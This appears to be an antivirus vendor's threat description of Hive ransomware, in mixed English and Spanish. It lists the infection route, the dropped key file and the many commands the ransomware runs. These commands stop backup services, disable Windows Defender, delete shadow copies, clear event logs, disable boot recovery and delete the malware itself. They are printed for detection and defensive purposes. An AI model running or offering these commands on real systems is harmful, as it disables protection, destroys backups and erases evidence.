Ransom.Win64.HIVE.YXBL1

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

• {Drive}\{random string}_.key.6ygpf

Agrega los procesos siguientes:

• net.exe stop "NetMsmqActivator" /y
• net.exe stop "SamSs" /y
• net.exe stop "SDRSVC" /y
• net.exe stop "SstpSvc" /y
• net.exe stop "UI0Detect" /y
• net.exe stop "vmvss" /y
• net.exe stop "VMware Physical Disk Helper Service" /y
• net.exe stop "VMwareCAFCommAmqpListener" /y
• net.exe stop "VMwareCAFManagementAgentHost" /y
• net.exe stop "VSS" /y
• net.exe stop "wbengine" /y
• net.exe stop "WebClient" /y
• sc.exe config "NetMsmqActivator" start= disabled
• sc.exe config "SamSs" start= disabled
• sc.exe config "SDRSVC" start= disabled
• sc.exe config "SstpSvc" start= disabled
• sc.exe config "UI0Detect" start= disabled
• sc.exe config "vmvss" start= disabled
• sc.exe config "VMware Physical Disk Helper Service" start= disabled
• sc.exe config "VMwareCAFCommAmqpListener" start= disabled
• sc.exe config "VMwareCAFManagementAgentHost" start= disabled
• sc.exe config "VSS" start= disabled
• sc.exe config "wbengine" start= disabled
• sc.exe config "WebClient" start= disabled
• reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
• reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
• schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
• schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
• reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
• reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
• reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
• reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
• reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
• reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
• reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
• vssadmin.exe delete shadows /all /quiet
• wevtutil.exe cl system
• wevtutil.exe cl security
• wevtutil.exe cl application
• wmic.exe SHADOWCOPY /nointeractive
• wmic.exe shadowcopy delete
• bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
• bcdedit.exe /set {default} recoveryenabled no
• cmd.exe /c "%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
• cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
• cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
• notepad.exe {Drive}\LdBi_HOW_TO_DECRYPT.txt
• cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "{Malware Path}\{Malware File name}"

(Nota: %Program Files% es la carpeta Archivos de programa predeterminada, que suele estar en C:\Archivos de programa).

Otros detalles

Hace lo siguiente:

• It deletes shadow copies.